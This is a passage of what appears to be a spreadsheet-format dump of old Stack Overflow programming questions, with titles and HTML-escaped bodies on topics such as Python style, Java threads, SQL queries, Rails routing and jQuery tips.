&lt;p&gt;I have &lt;I&gt;Build with runtime packages&lt;/I&gt; unticked, so shouldn't they be complied into the exe?&lt;/p&gt;
&lt;p&gt;Edit: the Project uses Jedi Packages (TJvPlugin) and running the program with out any plugin installed works fine. As Soon as i add a Plugin, the bpl not found errors reappear. Seems like ill have to live with the extra packages. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Percentages of subtotal in a report</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Report Designer in VS 2008. Is there a way to display the percentages of a subtotal in a crosstab report?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Python style: multiple-line conditions in IFs</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Sometimes I break long conditions in IFs to several lines. The most obvious way to do this is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  if (cond1 == 'val1' and cond2 == 'val2' and
      cond3 == 'val3' and cond4 == 'val4'):
      do_something
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Isn't very very appealing visually, because the action blends with the conditions. However, it is the natural way using correct Python indentation of 4 spaces.&lt;/p&gt;
&lt;p&gt;For the moment I'm using:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  if (    cond1 == 'val1' and cond2 == 'val2' and
          cond3 == 'val3' and cond4 == 'val4'):
      do_something
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But this isn't very pretty. :-)&lt;/p&gt;
&lt;p&gt;Can you recommend an alternative way ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's a good and stable C++ tree implementation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wondering if anyone can recommend a good C++ tree implementation, hopefully one that is 
stl compatible if at all possible.&lt;/p&gt;
&lt;p&gt;For the record, I've written tree algorithms many times before, and I know it can be fun, but I want to be pragmatic and lazy if at all possible. So an actual link to a working solution is the goal here.&lt;/p&gt;
&lt;p&gt;Note: I'm looking for a generic tree, not a balanced tree or a map/set, the structure itself and the connectivity of the tree is important in this case, not only the data within.
So each branch needs to be able to hold arbitrary amounts of data, and each branch should be separately iterateable. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Thread synchronization question (in java)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;my java application has a loading task which requires two server calls which can be parallelized. So I launch a Thread t1 (doing &lt;strong&gt;task1&lt;/strong&gt;) and a Thread t2 (for &lt;strong&gt;task2&lt;/strong&gt;).
I want then to do a specific task, &lt;strong&gt;task3&lt;/strong&gt; when both other tasks (1 &amp;amp; 2) are over. Naturally I can't tell which of &lt;strong&gt;task1&lt;/strong&gt; and &lt;strong&gt;task2&lt;/strong&gt; will finish first...&lt;/p&gt;
&lt;p&gt;Which would be for you the simplest (and safest) way to code this ?&lt;/p&gt;
&lt;p&gt;Thank you for your help&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a documented way to set the iPhone orientation?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an app where I would like to support device rotation in certain views but other don't particularly make sense in Landscape mode, so as I swapping the views out I would like to force the rotation to be set to portrait.&lt;/p&gt;
&lt;p&gt;There is an undocumented property setter on UIDevice that does the trick but obviously generates a compiler warning and could disappear with a future revision of the SDK.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[[UIDevice currentDevice] setOrientation:UIInterfaceOrientationPortrait];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Are there any documented ways to force the orientation?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update:&lt;/strong&gt; I thought I would provide an example as I am not looking for shouldAutorotateToInterfaceOrientation as I have already implemented that.&lt;/p&gt;
&lt;p&gt;I want my app to support landscape and portrait in View 1 but only portrait in View 2.  I have already implemented shouldAutorotateToInterfaceOrientation for all views but if the user is in landscape mode in View 1 and then switches to View 2, I want to force the phone to rotate back to Portrait.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Issue with localizing html title of a page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to localize my aspx pages. I'm done with content localization using L10n features provided by .net f/w, like resource files. But I'm finding it difficult to set local data in page titles. &lt;/p&gt;
&lt;p&gt;Most of the browsers, including IE and FF, shows content on window title with some boxes (FF will show properly localized text in tab, IE doesn't even do that). But its working fine in safari (on windows). &lt;/p&gt;
&lt;p&gt;When I did a research it seems like this issue exits ONLY for some of the languages. For example, the &lt;a href="http://www.bbc.co.uk/hindi/" rel="nofollow"&gt;Hindi version of BBC&lt;/a&gt; shows the title with boxes. But &lt;a href="http://news.bbc.co.uk/hi/arabic/news/" rel="nofollow"&gt;Arabic version&lt;/a&gt; shows the localized text in title.&lt;/p&gt;
&lt;p&gt;Can somebody please tell me why this is happening? How we can solve this issue?&lt;/p&gt;
&lt;p&gt;Note: My site is using Asp.net 2.0 / IIS&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I unit test a custom ant task?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am writing a custom ant task that extends Task. I am using the log() method in the task. What I want to do is use a unit test while deveoping the task, but I don't know how to set up a context for the task to run in to initialise the task as if it were running in ant.&lt;/p&gt;
&lt;p&gt;This is the custom Task:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class CopyAndSetPropertiesForFiles extends Task {
    public void execute() throws BuildException {
    	log("CopyAndSetPropertiesForFiles begin execute()");
    	log("CopyAndSetPropertiesForFiles end execute()");
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is the unit test code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CopyAndSetPropertiesForFiles task = new CopyAndSetPropertiesForFiles();
task.execute();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When the code is run as a test it gives a NullPointerException when it calls log.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;java.lang.NullPointerException
    at org.apache.tools.ant.Task.log(Task.java:346)
    at org.apache.tools.ant.Task.log(Task.java:334)
    at uk.co.tbp.ant.custom.CopyAndSetPropertiesForFiles.execute(CopyAndSetPropertiesForFiles.java:40)
    at uk.co.tbp.ant.custom.test.TestCopyAndSetPropertiesForFiles.testCopyAndSetPropertiesForFiles(TestCopyAndSetPropertiesForFiles.java:22)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Does anybody know a way to provide a context or stubs or something similar to the task?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Rob.&lt;/p&gt;
&lt;p&gt;Accepted answer from Abarax. I was able to call task.setProject(new Project());
The code now executes OK (except no logging appears in th console - at least I can exercise the code :-) ).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>computing performance</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to find out the time a function takes for computing the performance of the application / function.
is their any open source Java APIs for doing the same ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Help on Open source controls in commercial application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the implications of including a set of visual components released under a &lt;a href="http://www.mozilla.org/MPL/MPL-1.1.html" rel="nofollow"&gt;Mozilla Public License&lt;/a&gt; in a commercial application.&lt;/p&gt;
&lt;p&gt;Do I have any obligations?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Windows SharePoint Services vs. Microsoft Office SharePoint Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There's Windows SharePoint Services (WSS) and then there is Microsoft Office SharePoint Server (MOSS).  MOSS considerably more expensive than WSS (which ships as part of Microsoft Server licensing).&lt;/p&gt;
&lt;p&gt;My question is: what does MOSS do that makes it &lt;i&gt;worth&lt;/i&gt; the extra cost?  &lt;/p&gt;
&lt;p&gt;..and does &lt;a href="http://www.microsoft.com/Enterprisesearch/"&gt;Microsoft Search Server&lt;/a&gt; not compete with the &lt;a href="http://msdn.microsoft.com/en-us/library/ms563661.aspx"&gt;Business Data Cache&lt;/a&gt; (BDC)?&lt;/p&gt;
&lt;p&gt;Edit: The feature comparision page is helpful in illustrating the numerous features that MOSS has and WSS does not.  By the looks of it, most of MOSS's feature set is Enterprise oriented.  &lt;/p&gt;
&lt;p&gt;How would you describe the differences (or additional benefits) of MOSS over WSS in a couple of sentences?  In essence, what are the "big ticket" items in MOSS (and not in WSS)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Server 2005 Performance: Distinct or full table in WHERE IN statement</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have two Tables:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Document: id, title, document_type_id, showon_id&lt;/li&gt;
&lt;li&gt;DocumentType: id, name&lt;/li&gt;
&lt;li&gt;Relationship: DocumentType hasMany Documents. (Document.document_type_id = DocumentType.id)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We wish to retrieve a list of all document types for one given ShowOn_Id. &lt;/p&gt;
&lt;p&gt;We see two possiblities:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT DocumentType.*
FROM DocumentType
WHERE DocumentType.id IN (
    SELECT DISTINCT Document.document_type_id FROM Document WHERE showon_id = 42
);
SELECT DocumentType.*
FROM DocumentType
WHERE DocumentType.id IN (
    SELECT Document.document_type_id FROM Document WHERE showon_id = 42
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Our question is: when and if is it better to use the DISTINCT to get the smaller record set versus retrieving the whole table and the IN statement walking the table to the first match. (We guess that's what it does ;-))&lt;/p&gt;
&lt;p&gt;Is this different for different databases, is there a common answer?&lt;/p&gt;
&lt;p&gt;Or is there a better way of doing it? (We are in .NET land)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Processing Linux SIGnals using Gambas</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to send a (as yet undetermined) SIGnal from a bash script to a Gambas program when a specific file has been changed. &lt;/p&gt;
&lt;p&gt;How can I get my Gambas program to process this SIGnal?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Programmatically access currency exchange rates</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm setting up an online ordering system but I'm in Australia and for international customers I'd like to show prices in US dollars or Euros so they don't have to make the mental effort to convert from Australian dollars.&lt;/p&gt;
&lt;p&gt;Does anyone know if I can pull up to date exchange rates off the net somewhere in an easy-to-parse format I can access from my PHP script ?&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; I have now written a PHP class which implements this. &lt;a href="http://www.doctort.org/adam/general/currency-calculation-in-php.html"&gt;You can get the code from my website&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Default segment name in rails resources routing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to create a route in my rails application along the lines of&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/panda/blog
/tiger/blog
/dog/blog
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where panda, tiger, and dog are all permalinks (for an animal class)&lt;/p&gt;
&lt;p&gt;The normal way of doing this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;map.resources :animals do |animal|
 animal.resource :blog
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;would create routes along the lines of&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;/animals/panda/blog
/animals/tiger/blog
/animals/dog/blog
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But i do not want the first segment, as it will always be the same. &lt;/p&gt;
&lt;p&gt;I know I could do this by manual routing, but I want to know how to do using rails resources, as having animals and blogs is a requirement for me.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WHERE IN (array of IDs)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have webservice which is passed an array of ints.
I'd like to do the select statement as follows but keep getting errors. Do I need to change the array to a string?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[WebMethod]
public MiniEvent[] getAdminEvents(int buildingID, DateTime startDate)
{    
    command.CommandText = @"SELECT id,
                            startDateTime, endDateTime From
                            tb_bookings WHERE buildingID IN
                            (@buildingIDs) AND startDateTime &amp;lt;=
                            @fromDate";
    SqlParameter buildID = new SqlParameter("@buildingIDs", buildingIDs);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Serialization problem</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The situation is like this : Main project A. and a class library B. &lt;strong&gt;A references B&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Project B has the classes that will be serialized. The classes are used in A. Now, the problem appears when from Project A I try to serialize the objects from B. An exception is thrown that says a class from A cannot be serialized. This is the strange part since in the classes in B I cant have a reference to those in A. (a circular dependency would be created).&lt;/p&gt;
&lt;p&gt;How can I track down the problem ? because the exception method doesn't say where the Problem appeared ?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit :&lt;/strong&gt; 
Ok, I found the problem with the help of &lt;strong&gt;Kent Boogaart's&lt;/strong&gt; small app :D . I have a PropertyChanged listener in a class in project A that is not marked Serializable - and I don't want to mark it so. ( it would serialize that class to right ?)&lt;/p&gt;
&lt;p&gt;I've solved the problem with the event by following this link : &lt;a href="http://www.lhotka.net/weblog/CommentView,guid,776f44e8-aaec-4845-b649-e0d840e6de2c.aspx#commentstart" rel="nofollow"&gt;.NET 2.0 solution to serialization of objects that raise events&lt;/a&gt;.
There still is a problem , but it's probably something similar.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PS:&lt;/strong&gt; Great tool from &lt;strong&gt;Kent Boogaart&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL - state machine - reporting on historical data based on changeset</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to record user states and then be able to report historically based on the record of changes we've kept. I'm trying to do this in SQL (using PostgreSQL) and I have a proposed structure for recording user changes like the following.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE users (
  userid SERIAL NOT NULL PRIMARY KEY, 
  name VARCHAR(40), 
  status CHAR NOT NULL
);
CREATE TABLE status_log (
  logid SERIAL, 
  userid INTEGER NOT NULL REFERENCES users(userid), 
  status CHAR NOT NULL, 
  logcreated TIMESTAMP
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That's my proposed table structure, based on the data.&lt;/p&gt;
&lt;p&gt;For the status field 'a' represents an active user and 's' represents a suspended user,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;INSERT INTO status_log (userid, status, logcreated) VALUES (1, 's', '2008-01-01'); 
INSERT INTO status_log (userid, status, logcreated) VALUES (1, 'a', '2008-02-01');
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So this user was suspended on 1st Jan and active again on 1st of February.&lt;/p&gt;
&lt;p&gt;If I wanted to get a suspended list of customers on 15th January 2008, then userid 1 should show up. If I get a suspended list of customers on 15th February 2008, then userid 1 should not show up.&lt;/p&gt;
&lt;p&gt;1) Is this the best way to structure this data for this kind of query?&lt;/p&gt;
&lt;p&gt;2) How do I query the data in either this structure or in your proposed modified structure so that I can simply have a date (say 15th January) and find a list of customers that had an active status on that date in SQL only? Is this a job for SQL?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Spring security: adding "On successful login event listener"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm new to Spring Security. How do I add an event listener which will be called as a user logs in successfully? Also I need to get some kind of unique session ID in this listener which should be available further on. I need this ID to synchronize with another server.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Data from Google Analytics</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;So Google Analytics does not have an API that we can use to get our data, so is there an efficient way to programaticly fetch the data collected by Google, without logging it locally?&lt;/p&gt;
&lt;p&gt;Edit:
I would prefer a Python or PHP solution but anything will work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Alternative to Html.Button&lt;T&gt;?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know the Html.Button has been moved to the Microsoft.Web.Mvc namespace, but I really miss the generic versions that used to exist in the early Previews. &lt;/p&gt;
&lt;p&gt;All I want the Html.Button to do is to hit an action in my controller, but I'd rather not write the JavaScript in the onClickMethod argument.&lt;/p&gt;
&lt;p&gt;In my previous project I just snagged the generic Html.Button code from a previous preview release, but that doesn't seem like the best approach as things progress. There were also Html.NavigateButton... where is that and why should I have to recreate it?&lt;/p&gt;
&lt;p&gt;How is everybody else doing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to JSON decode array elements in JavaScript?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a JavaScript array that, among others, contains a URL. If I try to simply put the URL in the page (the array is in a project involving the Yahoo! Maps API) it shows the URL as it should be.&lt;/p&gt;
&lt;p&gt;But if I try to do a redirect or simply do an 'alert' on the link array element I get: &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;function(){return JSON.encode(this);}&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;As far as I see it this is because the browser does an JSON.encode when it renders the page, thus the link is displayed OK. I have tried several methods to make it redirect (that's what I want to do with the link) correctly (including the usage of 'eval') but with no luck.&lt;/p&gt;
&lt;p&gt;After following some suggestions I've run &lt;code&gt;eval('(' + jsonObject + ')')&lt;/code&gt; but it still returns the same output.&lt;/p&gt;
&lt;p&gt;So how's this done ? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>"TryParse / Parse like" pattern: what is the best way to implement it</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This question is a follow-up from &lt;a href="http://stackoverflow.com/questions/161822/how-to-indicate-that-a-method-was-unsuccessful"&gt;How to indicate that a method was unsuccessful&lt;/a&gt;. The xxx() Tryxxx() pattern is something that can be very useful in many libraries. I am wondering what is the best way to offer both implementations without duplicating my code.&lt;/p&gt;
&lt;p&gt;What is best:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public int DoSomething(string a)
{
     // might throw an exception
}
public bool TrySomething(string a, out result)
{
    try
    {
        result = DoSomething(a)
        return true;
    }
    catch (Exception)
    {
        return false;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public int DoSomething(string a)
{
     int result;
     if (TrySomething(a, out result))
     {
         return result;
     }
     else
     {
         throw Exception(); // which exception?
     }
}
public bool TrySomething(string a, out result)
{
    //...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd instinctively assume that the first example is more correct (you know exactly which exception happened), but couldn't the try/catch be too expensive? Is there a way to catch the exception in the second example?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best PHP lib/class to generate RSS/Atom</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to produce RSS/Atom feed in various applications, and I want to know a good lib/class wich is able to produce both, and which already handle all common problems.&lt;/p&gt;
&lt;p&gt;For example the one I used for year does not put the right format for date, so my feed is not well handled by several aggregators.&lt;/p&gt;
&lt;p&gt;Thanks, 
CÃ©dric&lt;/p&gt;
&lt;p&gt;Update : 
Why I am looking for a lib? Because the one I used for years, which I had hacked a few, have a little problem. Maybe a specification is not correctly followed.
&lt;a href="http://stackoverflow.com/questions/182615/why-my-rss-feed-duplicate-some-entries"&gt;http://stackoverflow.com/questions/182615/why-my-rss-feed-duplicate-some-entries&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Should one use &lt; or &lt;= in a for loop</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If you had to iterate through a loop 7 times, would you use:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (int i = 0; i &amp;lt; 7; i++)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;or:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (int i = 0; i &amp;lt;= 6; i++)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There are two considerations:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;performance&lt;/li&gt;
&lt;li&gt;readability &lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For performance I'm assuming Java or C#.  Does it matter if "less than" or "less than or equal to" is used?  If you have insight for a different language, please indicate which.&lt;/p&gt;
&lt;p&gt;For readability I'm assuming 0-based arrays.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;UPD:&lt;/strong&gt; My mention of 0-based arrays may have confused things. I'm not talking about iterating through array elements.  Just a general loop. &lt;/p&gt;
&lt;p&gt;There is a good point below about using a constant to which would explain what this magic number is. So if I had "&lt;code&gt;int NUMBER_OF_THINGS = 7&lt;/code&gt;" then "&lt;code&gt;i &amp;lt;= NUMBER_OF_THINGS - 1&lt;/code&gt;" would look weird, wouldn't it. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery Tips and Tricks</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h2&gt;Syntax&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/2218129#2218129"&gt;Shorthand for the ready-event&lt;/a&gt; by roosteronacid&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/2218135#2218135"&gt;Line breaks and chainability&lt;/a&gt; by roosteronacid&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/389474#389474"&gt;Nesting filters&lt;/a&gt; by Nathan Long&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/552831#552831"&gt;Cache a collection and execute commands on the same line&lt;/a&gt; by roosteronacid&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/1519474#1519474"&gt;Contains selector&lt;/a&gt; by roosteronacid&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/2750689#2750689"&gt;Defining properties at element creation&lt;/a&gt; by roosteronacid&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/3967325#3967325"&gt;Access jQuery functions as you would an array&lt;/a&gt; by roosteronacid&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/182666#182666"&gt;The noConflict function - Freeing up the $ variable&lt;/a&gt; by Oli&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/382853#382853"&gt;Isolate the $ variable in noConflict mode&lt;/a&gt; by nickf&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/2218120#2218120"&gt;No-conflict mode&lt;/a&gt; by roosteronacid&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Data Storage&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/382834#382834"&gt;The data function - bind data to elements&lt;/a&gt; by TenebrousX&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/5410587#5410587"&gt;HTML5 data attributes support, on steroids!&lt;/a&gt; by roosteronacid&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/504776#504776"&gt;The jQuery metadata plug-in&lt;/a&gt; by Filip DupanoviÄ‡&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Optimization&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/1019899#1019899"&gt;Optimize performance of complex selectors&lt;/a&gt; by roosteronacid&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/504732#504732"&gt;The context parameter&lt;/a&gt; by lupefiasco&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/389793#389793"&gt;Save and reuse searches&lt;/a&gt; by Nathan Long&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/382922#382922"&gt;Creating an HTML Element and keeping a reference, Checking if an element exists, Writing your own selectors&lt;/a&gt; by Andreas Grech&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Miscellaneous&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/389906#389906"&gt;Check the index of an element in a collection&lt;/a&gt; by redsquare&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/892617#892617"&gt;Live event handlers&lt;/a&gt; by TM&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/696385#696385"&gt;Replace anonymous functions with named functions&lt;/a&gt; by ken&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/191139#191139"&gt;Microsoft AJAX framework and jQuery bridge&lt;/a&gt; by Slace&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/922865#922865"&gt;jQuery tutorials&lt;/a&gt; by egyamado&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/998547#998547"&gt;Remove elements from a collection and preserve chainability&lt;/a&gt; by roosteronacid&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/191061#191061"&gt;Declare $this at the beginning of anonymous functions&lt;/a&gt; by Ben&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/1771311#1771311"&gt;FireBug lite, Hotbox plug-in, tell when an image has been loaded and Google CDN&lt;/a&gt; by Colour Blend&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/182715#182715"&gt;Judicious use of third-party jQuery scripts&lt;/a&gt; by harriyott&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/1584927#1584927"&gt;The each function&lt;/a&gt; by Jan Zich&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/1235178#1235178"&gt;Form Extensions plug-in&lt;/a&gt; by Chris S&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/2750689#2750689"&gt;Asynchronous each function&lt;/a&gt; by OneNerd&lt;/li&gt;
&lt;li&gt;&lt;a href="http://stackoverflow.com/questions/182630/jquery-tips-and-tricks/4962433#4962433"&gt;The jQuery template plug-in: implementing complex logic using render-functions&lt;/a&gt; by roosteronacid&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Visual Print Design for .NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a project that I'm working on and I need to be able to print out ID cards from the program. Are there any products out there that are reasonably priced so I can design a document for print and use it in .NET? I'm trying to avoid using System.Drawing from having to do it manually because when the company I work for needs to make changes to the ID card it will be a pain to change it later.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WorkFlow Unit Testing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to unit test the windows workflows?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Map a network drive to be used by a service</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Suppose some Windows service uses code that wants mapped network drives and no UNC paths. How can I make the drive mapping available to the service's session when the service is started? Logging in as the service user and creating a persistent mapping will not establish the mapping in the context of the actual service.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Determine highest .NET Framework version</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to determine the highest .NET framework version installed on a desktop machine from C\C++ code.  Looks like I can iterate the folders under &lt;code&gt;%systemroot%\Microsoft.NET\Framework&lt;/code&gt;, but that seems kind of error prone.  Is there a better way?  Perhaps a registry key I can inspect?  Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C wrapper to remove users on command "ps"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have one question maybe someone here can help me. If i do "ps aux --sort user" on linux console I have one list of users and their processes runing on the machine. My question is how do I remove the users name and print that list like this &lt;strong&gt;in a C program&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;(â€¦)
--------------------------------------------------------------------------
user: APACHE
--------------------------------------------------------------------------
3169 0.0 1.2 39752 12352 ? S 04:10 0:00 /usr/sbin/httpd
--------------------------------------------------------------------------
user: VASCO
--------------------------------------------------------------------------
23030 0.0 0.1 4648 1536 pts/1 Ss 20:02 0:00 â€“bash
(â€¦)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I print the user name then I print his processes... any ideas ?&lt;/p&gt;
&lt;p&gt;thx&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is returned when I call ToString() on an uninitialized char object property?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a c# object with a property called Gender which is declared as a char.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private char _Gender;
public char Gender
{
    get{ return _Gender; }
    set{ _Gender = value; }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What string is returned/created when I call MyObject.Gender.ToString()?&lt;/p&gt;
